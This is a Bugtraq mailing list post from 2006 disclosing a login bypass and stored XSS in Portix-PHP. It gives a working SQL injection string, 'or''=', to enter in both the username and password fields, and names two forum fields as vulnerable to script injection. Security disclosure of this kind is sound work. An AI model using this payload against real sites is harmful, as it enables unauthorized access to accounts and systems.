Bugtraq mailing list archives

Portix-PHP [login bypass & xss (post)]


From: saps.audit () gmail com
Date: 8 Nov 2006 18:17:40 -0000

product:Portix-PHP 
vendor site :http://portix2.be
risk : medium

log with :
username: 'or''='
passwd : 'or''='

xss post on the forum , vulnerable fields  :
titre
auteur

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit () gmail com


Current thread: